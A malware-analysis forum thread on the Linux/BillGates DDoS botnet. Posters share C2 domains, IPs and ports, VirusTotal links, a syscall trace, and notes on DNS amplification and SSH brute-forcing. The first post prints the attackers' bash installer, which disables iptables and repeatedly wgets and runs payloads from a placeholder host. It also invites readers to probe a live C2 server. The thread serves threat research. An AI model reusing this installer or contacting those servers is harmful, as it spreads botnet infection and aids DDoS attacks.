Linux/BillGates

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Tue Jan 13, 2015 11:56 am

Usual one, VT: https://www.virustotal.com/en/file/1808 ... 421148489/
Image
With the "active" effort infection using this script installer (noted the semi-automation trail):

Code: Select all

#!/bin/bash
#00000000000
#000000000000
#0000000000
#========================================================================
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/mmm*
while true

do
    ps aux | grep mmm | grep -v grep 
    if [ $? -eq 0 ];then
         sleep 10
    else
		ls -l /tmp/mmm
			if [ $? -eq 0 ];then
			 /tmp/mmm
			else
    cd /tmp/;wget http://IP:PORT/mmm ; chmod a+x mmm;/tmp/mmm
	fi
   fi
    ps aux | grep fk.sh | grep -v grep
    if [ $? -eq 0 ];then
         sleep 10
    else
	ls -l /tmp/fk.sh
	if [ $? -eq 0];then
	 /tmp/fk.sh
	else
cd /tmp;wget http://IP:PORT/fk.sh ; chmod a+x fk.sh;/tmp/fk.sh
        fi
   fi
done
It's a domain basis as CNC to knock-down:

Code: Select all

ma.wudikkk.com. 600 IN A 120.27.28.199
wudikkk.com. 3600 IN NS dns10.hichina.com.
wudikkk.com. 3600 IN NS dns9.hichina.com 
syscall PoC:

Code: Select all

sendto(5, "\333\373\1\0\0\1\0\0\0\0\0\0\2ma\7wudikkk\3com\0\0\1\0\1", 32, 0, 
{sa_family=AF_INET, sin_port=htons(53),sin_addr=inet_addr("202.238.95.24")}, 16);
CNC IP/port is up and live, feel free to play :-)

Code: Select all

120.27.28.199:1991 
Located at: 120.27.28.199||37963 | 120.27.0.0/17 | CNNIC-ALIBABA-CN-NET | CN | ALIYUN.COM | ALIYUN COMPUTING CO. LTD
Sample spotted+contributed by malmouse - #MalwareMustDie!
You do not have the required permissions to view the files attached to this post.

User avatar
kekieres
Posts: 10
Joined: Tue Feb 26, 2013 11:48 am

Re: Linux/BillGates

Post by kekieres » Wed Jan 14, 2015 6:36 pm

On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C6C? Just executing in a sandbox and monitoring the traffic? O using strace? both?
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Thu Jan 15, 2015 12:51 am

kekieres wrote:On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C6C? Just executing in a sandbox and monitoring the traffic? O using strace? both?

None of the above. This is an open public forum, and I know for sure some of the crooks we hammered are watching this forum closely too, so I am truly sorry I can't answer your question more in here. Moreover I don't know you at all.

User avatar
kekieres
Posts: 10
Joined: Tue Feb 26, 2013 11:48 am

Re: Linux/BillGates

Post by kekieres » Thu Jan 15, 2015 9:04 am

unixfreaxjp wrote:
kekieres wrote:On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C6C? Just executing in a sandbox and monitoring the traffic? O using strace? both?

None of the above. This is an open public forum, and I know for sure some of the crooks we hammered are watching this forum closely too, so I am truly sorry I can't answer your question more in here. Moreover I don't know you at all.
I truly understand you.
Well, I did it my way and I can say that the sample connects with 218.90.200.250 on port tcp/250000
As far as I've seen and understood, it's just reporting to the C&C.

Just after that contact, it's constantly trying to resolve hostname fk.appledoesnt.com that at the moment does not exist.

In case someone wants the pcap just contact me.

just my last question. I suppose that people have noticed with a simple strings that within all samples there is a big list of IP address. In my sample they are all located in Asia. Anyone has a clue of what they are?

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sat Jan 17, 2015 4:58 pm

BillGates ddoser with speedy infection, suspected a shellshock driven.
Image
VT: https://www.virustotal.com/en/file/7a91 ... 421512473/
CNC is in USA:

Code: Select all

Sun Jan 18 01:45:24 JST 2015
Connection to 23.228.102.133 25001 port succeeded!
TCP MMD.Kicks.PRC.Moronz:xxxx->23.228.102.133:25001 (ESTABLISHED)
at ASN: 46573 | 23.228.102.0/24 | GLOBAL-FRAG-SERVERS | USA | ARIEL MICHAELI
#MalwareMustDie!
You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 253
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Linux/BillGates

Post by Antelox » Thu Jan 22, 2015 8:05 pm

Hi,
my article about Kippo Honeypot and BillGates Botnet statistics with another one C&C (samples 3 week old):

Inside a Kippo honeypot: how the billgates botnet spreads

Regards,

Antelox

malwarelabs
Posts: 44
Joined: Tue Dec 10, 2013 9:07 am

Re: Linux/BillGates

Post by malwarelabs » Thu Feb 19, 2015 10:08 am

130 BillGates samples attached
pwd: infected
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Wed Jul 01, 2015 10:59 am

Linux/BillGates was used by the ChinaZ actor as payload, together with Linux/.Iptables|x.
Report http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT: https://www.virustotal.com/en/file/067f ... /analysis/
Image

Code: Select all

CNC Info:
Hostname: udp.f1122.org
IP: 61.160.213.18
Port: 25001

61.160.213.18| - |23650 | 61.160.213.0/24 | CHINANET-JS-AS | CN | chinatelecom.com.cn
ChinaNet Jiangsu Province Network
{
"ip": "61.160.213.18",
"hostname": "udp.f1122.org",
"city": "Nanjing",
"region": "Jiangsu",
"country": "CN",
"loc": "32.0617,118.7778",
"org": "AS23650 AS Number for CHINANET jiangsu province backbone"
}
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Fri Jul 03, 2015 9:48 pm

attacking router with ssh brute:
Image

using hacked PC to attack..obviously..
Image

the panel on that PC and weaponized with two ELF MIPS & x32 malware
Image

CNC: 123.249.45.210:36000
Image

VT:
https://www.virustotal.com/en/file/6c39 ... 435959461/
https://www.virustotal.com/en/file/9857 ... 435959488/

#MalwareMUSTDie!!
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sat Jul 04, 2015 10:45 pm

kekieres wrote:
unixfreaxjp wrote:
kekieres wrote:On 09-09-2015, we have located a sample.
(snipped)
just my last question. I suppose that people have noticed with a simple strings that within all samples there is a big list of IP address. In my sample they are all located in Asia. Anyone has a clue of what they are?
Those IPs are DNS amplyfier IP list used for DNS flood attack. Linux/BillGates malware has this function.

Illustration:
Image

Post Reply